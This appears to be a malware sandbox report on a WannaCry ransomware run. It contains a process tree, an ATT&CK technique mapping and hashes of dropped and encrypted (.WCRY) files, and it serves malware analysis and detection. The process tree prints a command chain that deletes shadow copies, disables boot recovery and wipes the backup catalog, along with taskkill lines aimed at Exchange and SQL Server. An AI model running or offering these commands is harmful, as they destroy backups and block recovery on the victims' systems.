C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:72

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1764

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:6068

C:\Users\Admin\Downloads\WannaCry.exe
"C:\Users\Admin\Downloads\WannaCry.exe"
1⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:4140

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 711722942626.bat
2⤵
- System Location Discovery: System Language Discovery
PID:4348

C:\Windows\SysWOW64\cscript.exe
cscript //nologo c.vbs
3⤵
- System Location Discovery: System Language Discovery
PID:2712

C:\Users\Admin\Downloads\!WannaDecryptor!.exe
!WannaDecryptor!.exe f
2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:5628

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im MSExchange*
2⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5324

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Microsoft.Exchange.*
2⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1768

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im sqlserver.exe
2⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5252

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im sqlwriter.exe
2⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5620

C:\Users\Admin\Downloads\!WannaDecryptor!.exe
!WannaDecryptor!.exe c
2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:5680

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c start /b !WannaDecryptor!.exe v
2⤵
- System Location Discovery: System Language Discovery
PID:5684

C:\Users\Admin\Downloads\!WannaDecryptor!.exe
!WannaDecryptor!.exe v
3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:3580

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
4⤵
- System Location Discovery: System Language Discovery
PID:2740

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic shadowcopy delete
5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3696

C:\Users\Admin\Downloads\!WannaDecryptor!.exe
!WannaDecryptor!.exe
2⤵
- Executes dropped EXE
- Sets desktop wallpaper using registry
- System Location Discovery: System Language Discovery
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:5080

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
1⤵
PID:1460

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
2⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:4308

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2140 -parentBuildID 20240401114208 -prefsHandle 2068 -prefMapHandle 2060 -prefsLen 21730 -prefMapSize 243020 -appDir "C:\Program Files\Mozilla Firefox\browser" - {0c3d608d-67ad-48de-b897-9db6a25c086b} 4308 "\\.\pipe\gecko-crash-server-pipe.4308" gpu
3⤵
PID:3504

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2472 -parentBuildID 20240401114208 -prefsHandle 2464 -prefMapHandle 2460 -prefsLen 21730 -prefMapSize 243020 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4ed277d1-a49f-49de-9bba-fe43fa31db31} 4308 "\\.\pipe\gecko-crash-server-pipe.4308" socket
3⤵
- Checks processor information in registry
PID:5800

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3632 -childID 1 -isForBrowser -prefsHandle 3624 -prefMapHandle 3620 -prefsLen 21285 -prefMapSize 243020 -jsInitHandle 1344 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f503fd44-2ef0-4b46-b08d-f28ad3846b4f} 4308 "\\.\pipe\gecko-crash-server-pipe.4308" tab
3⤵
PID:3656

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3156 -childID 2 -isForBrowser -prefsHandle 3920 -prefMapHandle 2980 -prefsLen 22612 -prefMapSize 243020 -jsInitHandle 1344 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {bdfe6d2d-7d1d-451c-bcc3-fa6170fb7d71} 4308 "\\.\pipe\gecko-crash-server-pipe.4308" tab
3⤵
PID:3224

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4360 -childID 3 -isForBrowser -prefsHandle 1764 -prefMapHandle 4328 -prefsLen 29040 -prefMapSize 243020 -jsInitHandle 1344 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {91edb1bf-5a29-428f-8af2-3839d57236d4} 4308 "\\.\pipe\gecko-crash-server-pipe.4308" tab
3⤵
PID:5788

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5108 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 5100 -prefMapHandle 5096 -prefsLen 29476 -prefMapSize 243020 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {caab757d-b22f-4aec-8027-b57e041aca33} 4308 "\\.\pipe\gecko-crash-server-pipe.4308" utility
3⤵
- Checks processor information in registry
PID:4992

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5508 -parentBuildID 20240401114208 -prefsHandle 5500 -prefMapHandle 5496 -prefsLen 29971 -prefMapSize 243020 -appDir "C:\Program Files\Mozilla Firefox\browser" - {63a2eb4d-eeb5-4a17-814b-b5178ae9a7e5} 4308 "\\.\pipe\gecko-crash-server-pipe.4308" rdd
3⤵
PID:2800

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3748 -childID 4 -isForBrowser -prefsHandle 3752 -prefMapHandle 3740 -prefsLen 28189 -prefMapSize 243020 -jsInitHandle 1344 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f6221fb5-5b7a-444f-a4e0-700c332d4435} 4308 "\\.\pipe\gecko-crash-server-pipe.4308" tab
3⤵
PID:1948

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5680 -childID 5 -isForBrowser -prefsHandle 5684 -prefMapHandle 5704 -prefsLen 28189 -prefMapSize 243020 -jsInitHandle 1344 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2394827b-10b8-4237-90ef-4d6db5cace5f} 4308 "\\.\pipe\gecko-crash-server-pipe.4308" tab
3⤵
PID:2016

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5764 -childID 6 -isForBrowser -prefsHandle 5708 -prefMapHandle 5868 -prefsLen 28189 -prefMapSize 243020 -jsInitHandle 1344 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a55a1b33-fffa-43b3-9404-d07b28fa1c1f} 4308 "\\.\pipe\gecko-crash-server-pipe.4308" tab
3⤵
PID:4496

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:2348

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4712

C:\Users\Admin\Downloads\!WannaDecryptor!.exe
"C:\Users\Admin\Downloads\!WannaDecryptor!.exe"
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:384

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x4 /state0:0xa39c5055 /state1:0x41c64e6d
1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:5484

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Windows Management Instrumentation

T1047

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Subvert Trust Controls

T1553

SIP and Trust Provider Hijacking

T1553.003

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Defacement

T1491

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\updates\308046B0AF4A39CB\update-config.json

Filesize
102B

MD5
7d1d7e1db5d8d862de24415d9ec9aca4

SHA1
f4cdc5511c299005e775dc602e611b9c67a97c78

SHA256
ffad3b0fb11fc38ea243bf3f73e27a6034860709b39bf251ef3eca53d4c3afda

SHA512
1688c6725a3607c7b80dfcd6a8bea787f31c21e3368b31cb84635b727675f426b969899a378bd960bd3f27866023163b5460e7c681ae1fcb62f7829b03456477

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
302c3de891ef3a75b81a269db4e1cf22

SHA1
5401eb5166da78256771e8e0281ca2d1f471c76f

SHA256
1d1640e5755779c90676290853d2e3ca948f57cf5fb1df4b786e277a97757f58

SHA512
da18e7d40376fd13255f3f67a004c3a7f408466bd7ce92e36a4d0c20441279fe4b1b6e0874ab74c494663fb97bd7992b5e7c264b3fc434c1e981326595263d33

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
c9efc5ba989271670c86d3d3dd581b39

SHA1
3ad714bcf6bac85e368b8ba379540698d038084f

SHA256
c2e16990b0f6f23efdcecd99044993a4c2b8ba87bd542dd8f6256d69e24b93b3

SHA512
c1bc0dc70ab827b54feb64ad069d21e1c3c28d57d126b08314a9670437881d77dba02b5cca57ef0f2aa7f8e7d4d163fbd2c6f246ea2d51ce201d61a89015e8b7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
2KB

MD5
c651c62852352cedeb17880eacfcf8c3

SHA1
d4a8b4cfd89055851963f6e30a1a8923ef416850

SHA256
cfbd0a804bb4645bf2afef9814087f73c1e23a92102547f893bb2f83bdee2135

SHA512
b22520a5c70cf7c27ed2d08d30b8af8d3ed4da2acf68a0b84745ad4a45c961255c738988d2f9de6d4473bd8e0e07b8466e3152072cadd47fcc3ae9a9e6c72038

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
579B

MD5
7b2253a6fa7b6c941784b92704186809

SHA1
eef99141df17a30e851e15a88373ad50438a1180

SHA256
602fb72bf192a45033d30ad0518344b2f7c173894ff70934259944aab1bf7c88

SHA512
0772930a8d2aaa2f1d2bc65f93de20f65c26145f18ac567f15714a467c203726bade5252a906f40231bda84ce1f663d517a062528de0b0f94df8da358a5892b8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
1d29dea8df8a6734e15859943068a836

SHA1
f16735834f443d4ca736432828d3dbecbb2b635d

SHA256
5eb23d85c93cb95e40d2ce2ba6529df9dd0a68a2aed9fcca9c806e586a1c0d90

SHA512
1acadef7cf6905fcdd3f9015fac37ee9cf87fbed35290f6451ba8e88949ca21346993929d14c152073ab3bad734a9537a1e6ce1a8e738a7097f225423b9eb64f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
0b2c5065a650dce396c471f27bb2de3c

SHA1
6e55211e9752841f4eaceebd30a23c692d975343

SHA256
78ae8007eda9012a307524dfdf80a0fda99ab61dabd15d79118c8fca64465271

SHA512
7dae35e73d06787ac8ed1f36ee73f0c88724ea1f55d2aaa23d7f046dd1476411e5c29db2c63660c1dbffea1ed8da1ad34c521f34b6c4243f43a8a81bf436c998

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\bb48f793-f863-48d1-8ff2-6c64fce68ab4.tmp

Filesize
6KB

MD5
717876409b0b678ff6ba947f83d784a7

SHA1
1499b8844ee82d206d102d6e98a16610feecf933

SHA256
76e441f1a251e2c80d2ea8e5bc2ad7325a6c03ebaa2e92ed42fc13858bad4110

SHA512
e971bcc3530b8cc59771930736826a4629db7bd0fa491f3cb5794a0809fd06a13d987276364610f5a0c5328416cff1b8b8d59a40c68158751650b4f3fcfd792b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\heavy_ad_intervention_opt_out.db.WCRY

Filesize
16KB

MD5
6d397127d929616961355682a1e761c6

SHA1
8c7a171eb4157a20a473996d98c8c17931d51f30

SHA256
be56634e5eb45be2beed19298aa2b2b5a08ce85e1568dd6fdcb03e1635895614

SHA512
ab0c07cbcb0d0c1f7b8472d315f90bca28c2d82c6775dc47098de23a9c6f2aba9092fdbd89b87dfa97cbb973a60863195f773e59619fadcf9be16ec656641ea2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db

Filesize
72KB

MD5
fb20d5c0646c0bb24c67c5275197ffee

SHA1
1f73f106dee33806aa32ecc057a0d30aa7d29dbd

SHA256
31426e87d5b48082171fc5d3fa833f3b2752da6a44514c1d2929a3d3753ba27a

SHA512
1d0fdcabc6d87fdceac26ba09de40dac8b84cba40e620759264fd15147b21faaca80fb4c6a4645ea5e03b724a9ad12d24a96ec2ac522570b99ebe3c3e07cd0b9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
84a90cf594879ab0dae85226907606ae

SHA1
f4fc57bde46ebf0065d0cd2d74c0d3e584397ba3

SHA256
e7da35c4ab92111dc6fd874247dbe7672906558a01df880ded83333a5cf23722

SHA512
4dec1905893eb378888089aba5df22bd5a454177030e4bbf0b84668f0d7cd04b8b326bc3f79596adcc5c62639ff7ae2abe9ed07e0274273d35a2013e08813303

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
8c0bd0745bd589832973e584609d1254

SHA1
bf0a5653b648b1a963a8fe112b2c867fa3627ce3

SHA256
1c5394ecb7346d15de0718b7e56fccda7280b16e1ba0f607799faef1b0d23101

SHA512
c8708aaec70eb05bd9b078fc5c034dbcc00db10452e0ff94db8d565e8e0badccdefd995d4800a504dcf4e12345a6bdf17e7d09360b01e857e8e4adbc5de1bcb5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
00d3d01cd6f2ad5484320ddefd35ae8e

SHA1
950b54f9a56b989d07a36f5ff0075933c208545b

SHA256
56aef1e32b6d009c1c94d8de913aae0cd61043978e1f99494a32c324ef7753ef

SHA512
455815ebd5c6a7a046520f7038eeec04a6bd9d1f223a2b6dec1d7a907fea5c23ee349e01dd88272d2efccea2556914c15613cfc2ded9c6d18518faba8bf3b94f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\images\folderIcon.svg.WCRY

Filesize
1KB

MD5
69d01555910c6111a110748e4e390604

SHA1
db2bcc40c609f780c57f5790826bf3ca2c5d7cf3

SHA256
a840e69f2134c1b52757e8e6140020b9fff76eff56ff45b19368f37413e5902c

SHA512
a02a0041c41fc2803e04746d5576e0776c563aef52ee32140bd1be3bfc66a60f43fa341980b553ab274197945aa0f6a27402c1bc34835e33dec4c37ea282b910

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\images\stackedIceCubes.svg.WCRY

Filesize
4KB

MD5
1853d1cabf8275ae4581c79e7f321a43

SHA1
b361911fc04673a611429db3e8243d9416b4e760

SHA256
b80d905f37c20a826b7db284b9920da25810250d9fa5a9bde241501e1631465b

SHA512
dde9a1d468d2b74e98b6bc12ec5ec1761290a1024081b702fbaedee3044844fd8705fd5acdd7d0be17e3825b8ab3c47e04397ce1ae3ea2cf324a7d3ac6095437

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x698r3gu.default-release\activity-stream.discovery_stream.json

Filesize
18KB

MD5
c6c08a1ee353769fba520edbb3455ac2

SHA1
e887d8f09f75765d9f73d2639161ffa096a4d390

SHA256
528f9d9fda048c98a900eb4b0c16531090dfe48fe5ff9be35f175d8a2266f4e4

SHA512
ccce423536cb40063c752df63bba81855e43c88c8e2ac8ea816583b2f73c3c8800b0e7d8d5efeb06a9f048dfe855f0730269cdeb0dd84755ef133ca477669be9

Download Submit
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SearchHoverUnifiedTileModelCache.dat

Filesize
10KB

MD5
eed1599235b9dd933e13cbd5751d7eec

SHA1
d461f7edc8bdb31b672f97b18d34e38bb7c96c4b

SHA256
13ee96f0fd8b45de1603cea7aa86ddaa749ea580989d6cb806d944f3547fbf43

SHA512
9679690676ef1ede8030e26359381a092eaec7cb671d51e91d8cd446006301bcb98518b977fd5d475e777baa11dd28e69135c517e3b3d74475134bfed4e8da9e

Download Submit
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SettingsCache.txt

Filesize
846KB

MD5
766f5efd9efca73b6dfd0fb3d648639f

SHA1
71928a29c3affb9715d92542ef4cf3472e7931fe

SHA256
9111e9a5093f97e15510bf3d3dc36fd4a736981215f79540454ce86893993fdc

SHA512
1d4bb423d9cc9037f6974a389ff304e5b9fbd4bfd013a09d4ceeff3fd2a87ad81fe84b2ee880023984978391daf11540f353d391f35a4236b241ccced13a3434

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x698r3gu.default-release\datareporting\glean\db\data.safe.tmp

Filesize
5KB

MD5
7b3b07050eb6e0876b1ee076522abc8b

SHA1
8c58e321b4f5c0eb7162e071cfca2da02204be56

SHA256
4481f31a5edc7f9af931a5fc3a5b8154202072b4b87861948cd88d2dc0e442a5

SHA512
58a6f3344b5bc3389f715e4f9ea73f35461adef20f238de96fd878c212df8d022a4a93456c588d5d5c22971f99f6c7ea5ae27ad2b0e45a00fc5ad6610214fe6c

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x698r3gu.default-release\datareporting\glean\db\data.safe.tmp

Filesize
6KB

MD5
21d0a954e7908a47c327d8d7ca5bec72

SHA1
091f4d2dd53cce859ba9f71ea22025e78a4d0aa2

SHA256
7e2c65b0b05d9a9b252fe45cf801c7e59b29e821852dc48c41b16c785df0042b

SHA512
e5892dfec216f9482f81562809bf86cd3632ce1a95098eb5aa189ece0c5f8579174e3aebb7285a443ce34d5f07908452ee1106e387734918fe197928a67941a1

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x698r3gu.default-release\datareporting\glean\db\data.safe.tmp

Filesize
15KB

MD5
f967f7c36ba911b0c981205c3cd47471

SHA1
85d70a496ace7251be157759486cd3c2cb33b8b9

SHA256
9f8ae81eccc5e41102be7eb4c3dea2004716ad927172955ff9c800ec20003d16

SHA512
6e8c578260863e0f2220e1d0f6481177d37207ce467c91b213a3d6121a382cbcf200b137c7e09e0251add9577598bd44b31490c3de0e7dfbd66b6fcd7b4080e3

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x698r3gu.default-release\datareporting\glean\db\data.safe.tmp

Filesize
5KB

MD5
456ceb3b57a8236c165295e9cd5282c2

SHA1
3b125034ee21655a5128156f6362e522922fac46

SHA256
d764314b59bf6cf658c16f883824d4b1379051e5a633e045330d0ae6a12ec673

SHA512
0b35f2b55dce40b719c42c96facc1e91f602096543a67082ff4c320caf37ec899d4c0535f94752dc9c15ccfab0428118c32d820f2dd0f5a7c014b23bf0813d74

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x698r3gu.default-release\datareporting\glean\pending_pings\4753192a-e732-4149-929a-4fdd7ffd1a4e

Filesize
25KB

MD5
5a3bce0bb64661d30856fda45026d38b

SHA1
15dad557e7aefb949ea71fb1a791f763e62f5064

SHA256
b0a1d64df0503ea3c7dc4ac5ddfc627df06192259761a8f43f2824085609c184

SHA512
43d5af9ba282106e6ee699d6d6ddd928d679177f5ebd587c8a34a72274d48dba3e60a995932fea775ec83ee6fa275f0b0e524fd6cac794b0b997f744d13c3e27

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x698r3gu.default-release\datareporting\glean\pending_pings\4fea3f3e-5a28-4998-b69f-651450bdb59f

Filesize
982B

MD5
56e7be51dd1fccf4a0f08c0592cdf14c

SHA1
890a8748658d3510c7c23744316f12fd0280fbe7

SHA256
4561480395ea8c48974b9fefcde54e2d5142c2a2d3397603df84bab30085aaf7

SHA512
78b4252ea5ca36dd6c3ccac46dc8e28ac211ee8ee88a1ea6e9fc021228a9a13771c84a85df317cdf7d5ed765a1119de2d7a68b6073268ffce2b6034edbbebf7e

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x698r3gu.default-release\datareporting\glean\pending_pings\7ed42014-8cf2-404c-bc8c-0b50174ed0e3

Filesize
671B

MD5
ca1f6847ea48d3dbf54ba2cb337f0501

SHA1
f9489c83a824093640093492b81d9c399201ea32

SHA256
2e61914bcd9cbeead7a2d869f08cc8d2eeecf509559f3c74f2a4f8cb2cb7b12c

SHA512
4484428fee0a589d9dca5f4b57096b22433540a4623eb1fcf53ef625ea3ff6a0bb58c5c248b767fc1b26d73e36af0cecf882c12a2896334406a868c807ce8022

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x698r3gu.default-release\prefs-1.js

Filesize
10KB

MD5
e6f245e939c0cbc9ccc0bea05a649cd4

SHA1
c55be910346012441e1c25602a23dfe7dd2088d0

SHA256
d4fa92c0d383954d3c22ef8b436c7996d68f0ecaf2f22ad966d6ce5058d48a71

SHA512
4f0b88743344dfdc9028ca759cc04e289ceada125552c9827360ddc01cfaa49029633f4914ff86e4e3264f77a73ec65d99f21ffab299fda25cb57bdefbec1b28

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x698r3gu.default-release\prefs.js

Filesize
1KB

MD5
512c6027faa81a09c70f08b90fd6ef37

SHA1
ebc525cc6f63276642d0334a1bcfe310157c5dfa

SHA256
3b5d32c297459e57ecff4acbf1baa84b4916a4c273cc5487d4d72a2a0a38faa4

SHA512
d7cde119f4a38c744972bb54252748808ef62e8c90662db028a175c4770f1768b0916088d48dd39f7beaed308c253e8d943276b86e9caa961396da132bc1fd1f

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x698r3gu.default-release\sessionCheckpoints.json

Filesize
212B

MD5
29ce37dc02c78bbe2e5284d350fae004

SHA1
bab97d5908ea6592aef6b46cee1ded6f34693fa2

SHA256
1bfee61e2f346959c53aa41add4b02d2b05c86c9f19ffefe1018f4a964bf4693

SHA512
53a9eb746e193c088210d8eaa6218d988f3a67ee4cb21844d682ff0178db040932404f5ce2f3cf8b4576313ba0ec33c04ca288c3412bfa5df7dd8230cc2068bb

Download Submit
C:\Users\Admin\Documents\DisconnectExport.pptx.WCRY

Filesize
1.6MB

MD5
217c1d6d3384e200233db4649b8f154e

SHA1
fee88219b2a21bfe8a587e8ecdeeed404d27c8af

SHA256
c66030df181dcc01d92270c168c9ceb36fa209526d4236207b17e9a4ca21c837

SHA512
07fcb04f73492a78f6864e63935ec7ba50e75dd00f82a193d5063626c07d738b2363885a8b24f399fb0ba0fdc2f1a9cbe807dd9bd5197e949c3ad37a6cc2f265

Download Submit
C:\Users\Admin\Downloads\!Please Read Me!.txt

Filesize
797B

MD5
afa18cf4aa2660392111763fb93a8c3d

SHA1
c219a3654a5f41ce535a09f2a188a464c3f5baf5

SHA256
227082c719fd4394c1f2311a0877d8a302c5b092bcc49f853a5cf3d2945f42b0

SHA512
4161f250d59b7d4d4a6c4f16639d66d21b2a9606de956d22ec00bedb006643fedbbb8e4cde9f6c0c977285918648314883ca91f3442d1125593bf2605f2d5c6b

Download Submit
C:\Users\Admin\Downloads\!WannaDecryptor!.exe.lnk

Filesize
590B

MD5
e9452a41a406ea3e0838ec48fc6fd5be

SHA1
7fdda319d014ae6b2b510ec66d716655fefef7d8

SHA256
11bd742c74f49a218a4544003ec57096c7f4afd636cf473cc42403a7f66825ea

SHA512
ed5913caa984922414981bc543c676b6efaa301dbcee10957e4a3d183aed21c1934492ab8063b4247d30fbf52a52aecfaa9f65467fe57e1b760a6a222950c256

Download Submit
C:\Users\Admin\Downloads\00000000.eky

Filesize
1KB

MD5
61adaef103c998bbfa4ebce9d7c21029

SHA1
1d36bae8dae586296122a3e6a6fdf191757a8da6

SHA256
1ada2936a28994b8d2a31bca7a92e7545aac4e8543019534ad21f6ff7c2d1810

SHA512
fb84736c2e859746b90eaee4e8a866c42643c19edcb7c85f3bf0d42b8b5327363b5b09d76c6e3afad070c74e960fd9f6762aab921c23e55072c063e1c2eea4ae

Download Submit
C:\Users\Admin\Downloads\00000000.res

Filesize
136B

MD5
680efa0bf4d6b0644e7115cdf2cf77b5

SHA1
ba580bfa4f077535e7678eda6a31a539e11939e4

SHA256
3de232ffe20622a4933c58c0fff25905ce4abd2de55388e89d00c43bd22c6933

SHA512
820277b4b781e65a9cb1204f525d52716f2892e68c93e2951302d8d1e80582cc4b4078e95a4fa678078327bddb2bb137fa7bbda4d23542ebe78e80b476791e37

Download Submit
C:\Users\Admin\Downloads\00000000.res

Filesize
136B

MD5
26a0fbf483f0843942f5ba5951d2f597

SHA1
e2373173243b140e4419b57d4a525b10171c45c8

SHA256
35c60139ca006f1656c8a7aea730c41a9497c88771fa60020c3ed27243a33166

SHA512
0742e19436d90e4962e59a2812c7a3ab57047dc92ccd94e5fa3102e3308af860654eac03ab9440763fc5175869e0dd42e044899fc8f251e276c7f426042e1e17

Download Submit
C:\Users\Admin\Downloads\00000000.res

Filesize
136B

MD5
3982107a27c42a524a93ceddfa473e04

SHA1
98124e809273026cc295329240ff52d870f0cb72

SHA256
3c16f49697a0807a37e4f4fa52747442779cfaff4ffa7ce1b682f4ec40be8e7e

SHA512
5fd476e4015fba5c8960594acb0a7f144b612be14d979f92a6599c1b762a104257878a4d231bee8e0ce099509af51ac280de87a21ce10b6bda1657c82955c457

Download Submit
C:\Users\Admin\Downloads\00000000.res

Filesize
136B

MD5
7f502f2e44a8a63d81b933116282f043

SHA1
3745ad965c0c6fa6b73af5dd3f69ba00c04f0a52

SHA256
c0370aaf88aaa8ae9b053e6560f8ea8632fff8bd7a9e3971c65cd97e31a58ded

SHA512
029a8583da89e08838fc4dc5de5aa7c201e4109f73258bf720d9fa905ea14e8f866051245813155222938bb1955bdccd002cc6f68f3fddaddda722c446992073

Download Submit
C:\Users\Admin\Downloads\711722942626.bat

Filesize
318B

MD5
a261428b490a45438c0d55781a9c6e75

SHA1
e9eefce11cefcbb7e5168bfb8de8a3c3ac45c41e

SHA256
4288d655b7de7537d7ea13fdeb1ba19760bcaf04384cd68619d9e5edb5e31f44

SHA512
